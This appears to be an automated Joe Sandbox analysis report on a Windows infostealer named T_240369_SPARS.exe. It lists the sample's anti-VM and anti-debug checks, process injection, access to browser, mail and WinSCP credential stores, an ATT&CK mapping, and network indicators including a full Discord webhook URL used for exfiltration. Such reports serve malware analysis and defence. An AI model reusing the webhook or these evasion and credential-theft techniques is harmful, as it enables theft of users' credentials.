                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeThread delayed: delay time: 594607Jump to behavior
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4085282940.0000000000EED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeCode function: 1_2_01147040 CheckRemoteDebuggerPresent,1_2_01147040
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeMemory written: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeProcess created: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe "C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7304, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: T_240369_S#U0130PAR#U0130S.exe PID: 7340, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.55e0000.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.T_240369_S#U0130PAR#U0130S.exe.41af790.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                        Windows Management Instrumentation
                        1
                        Scheduled Task/Job
                        111
                        Process Injection
                        1
                        Masquerading
                        1
                        OS Credential Dumping
                        1
                        Query Registry
                        Remote Services1
                        Email Collection
                        11
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        1
                        Disable or Modify Tools
                        1
                        Credentials in Registry
                        531
                        Security Software Discovery
                        Remote Desktop Protocol1
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        261
                        Virtualization/Sandbox Evasion
                        Security Account Manager1
                        Process Discovery
                        SMB/Windows Admin Shares1
                        Data from Local System
                        3
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                        Process Injection
                        NTDS261
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput Capture14
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                        Obfuscated Files or Information
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Software Packing
                        Cached Domain Credentials1
                        System Network Configuration Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading
                        DCSync1
                        File and Directory Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem34
                        System Information Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        T_240369_S#U0130PAR#U0130S.exe47%ReversingLabsByteCode-MSIL.Trojan.Zilla
                        T_240369_S#U0130PAR#U0130S.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        discord.com1%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        https://discord.com0%Avira URL Cloudsafe
                        https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNd0%Avira URL Cloudsafe
                        http://discord.com0%Avira URL Cloudsafe
                        https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWub0%Avira URL Cloudsafe
                        https://discord.com1%VirustotalBrowse
                        http://discord.com1%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        discord.com
                        162.159.137.232
                        truetrueunknown
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubgOFeoq2CnEl3NjjJYkJNdtrue
                          • Avira URL Cloud: safe
                          unknown
                          http://ip-api.com/line/?fields=hostingfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://discord.comT_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmptrue
                            • 1%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://media.discordapp.net/attachments/1220534378975854717/1222892686101708902/user-528110_2024-0T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netiT_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://stackoverflow.com/q/14436606/23354T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://account.dyn.com/T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netJT_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://discord.com/api/webhooks/1220536277670170814/IOSQHt77jsZT7zo7kkUiyq8x8TaToq4-BxVLqMXGe4ffWubT_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000402000.00000040.00000400.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://stackoverflow.com/q/11564914/23354;T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://stackoverflow.com/q/2152978/23354T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          http://ip-api.comT_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/mgravell/protobuf-netT_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://cdn.discordapp.com/attachments/1220534378975854717/1222892686101708902/user-528110_2024-03-T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://discord.comT_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 1%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameT_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  208.95.112.1
                                                  ip-api.comUnited States
                                                  53334TUT-ASUSfalse
                                                  162.159.137.232
                                                  discord.comUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1417014
                                                  Start date and time:2024-03-28 13:58:06 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 4s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:6
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:T_240369_S#U0130PAR#U0130S.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:T_240369_SPARS.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@3/1@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 95%
                                                  • Number of executed functions: 377
                                                  • Number of non-executed functions: 44
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  TimeTypeDescription
                                                  13:58:55API Interceptor10803877x Sleep call for process: T_240369_S#U0130PAR#U0130S.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  208.95.112.1QUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                  • ip-api.com/json/?fields=11827
                                                  x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  salaryinfo24.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Wage_Plan_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  DHL AWB_5934_5682.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Yeni sipari#U015f.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  Payment Slip (SWIFT)#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  ESTADO DE CUENTA DHL -46474637.exeGet hashmaliciousAgentTeslaBrowse
                                                  • ip-api.com/line/?fields=hosting
                                                  162.159.137.232biden.ps1Get hashmaliciousUnknownBrowse
                                                    stub_builder.exeGet hashmaliciousBlank GrabberBrowse
                                                      STRIKER.exeGet hashmaliciousUnknownBrowse
                                                        e.exeGet hashmaliciousUnknownBrowse
                                                          MNPOk988.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                                                            ZoominstallerFull.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                              paymen_Copy2024tslip.exeGet hashmaliciousVector StealerBrowse
                                                                Built.exeGet hashmaliciousBlank GrabberBrowse
                                                                  http://marketing-volt.at.ply.ggGet hashmaliciousUnknownBrowse
                                                                    17087985678d37d3b9753a4ad20a0f21a298f76cc8f2443c078d96cd6b41214604c859966f722.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      discord.combiden.ps1Get hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      z40Lsbgddffz3E3gUR.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 162.159.138.232
                                                                      yM1WTtfwI3.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                      • 162.159.135.232
                                                                      h08xdwuTfW.elfGet hashmaliciousUnknownBrowse
                                                                      • 162.159.128.233
                                                                      stub_builder.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • 162.159.137.232
                                                                      STRIKER.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      STRIKER.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.137.232
                                                                      SecuriteInfo.com.MacOS.ReverseShell-C.28203.22681.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                      • 162.159.128.233
                                                                      e.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.138.232
                                                                      e.exeGet hashmaliciousUnknownBrowse
                                                                      • 162.159.136.232
                                                                      ip-api.comQUOTATION_MARQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.CrypterX-gen.9933.28197.exeGet hashmaliciousPureLog Stealer, Xehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 208.95.112.1
                                                                      salaryinfo24.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 208.95.112.1
